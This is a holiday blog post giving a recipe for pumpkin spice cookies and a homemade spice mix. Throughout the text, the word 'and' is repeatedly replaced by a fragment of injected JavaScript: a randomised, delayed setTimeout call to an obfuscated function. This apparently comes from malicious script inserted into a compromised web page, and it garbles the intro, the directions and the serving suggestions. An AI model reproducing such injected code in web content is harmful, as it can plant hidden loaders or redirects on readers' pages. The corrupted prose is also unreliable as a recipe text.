Day 2 I Pumpkin Spice Cookies by Pear Tree Diaries

We collaborated with food blogger Jasmine Pereira of the famous Pear Tree Diaries food blog to whip up a festive recipe that hits the spot. Inspired by the Pumpkin Spice Latte, she created a recipe that looks good on every dinner table (andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and in your tummy). Put your baking face on, because by the end of it you'll be beaming cheek to cheek.

 

Pumpkin Spice Mix Ingredients:

2 1/2 tsp. ground cinnamon

1 tsp. dry ginger powder

1 1/2 tsp. ground cloves

1 tsp. ground nutmeg

 

 

Pumpkin Spice Mix Direction: 

Stir all the ground ingredients together andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and store in an air tight container to retain fragrance andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and freshness.

 

 

Pumpkin Spice Cookies Ingredients: 

2 1/2 cups all-purpose flour

1 tsp. baking powder

1 tsp. baking soda

2 1/2 tsp. pumpkin spice mix

1/2 teaspoon sea salt

2 sticks or 8 ounces unsalted butter, at room temperature

2 cups granulated brown sugar (or white sugar)

2 medium eggs, at room temperature

1 teaspoon vanilla extract

 

 

 

 

 

Pumpkin Spice Cookies Direction: 

1. Pre-heat oven to 180°C andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and line baking tray with parchment paper; set aside.

2. Whisk flour, baking powder & soda, pumpkin spice mix andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and salt in a bowl; set aside.

3. Place melted butter andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and brown sugar in a bowl andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and beat on medium speed until fluffy, about 3-4 minutes.

4. Next, beat in egg andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and vanilla extract to the sugar butter mix on medium speed, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and beat until incorporated, about 30 seconds.

5. With the mixer on low speed, add dry ingredients andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and mix until incorporated to form cookie dough.

6. Scoop pumpkin spice cookie dough on to the parchment paper into preferred shape andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and bake for 20 – 25 minutes until lightly brown for 180°C. And voila!

 

 

Eat as is or you can sprinkle some good ol' powdered sugar, sometimes it's the best friend your cookie can have. Or whip up some icing in a cone andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and go to merry town with Christmas patterns.

 

 

 

How you enjoy them, however, is entirely up to you.
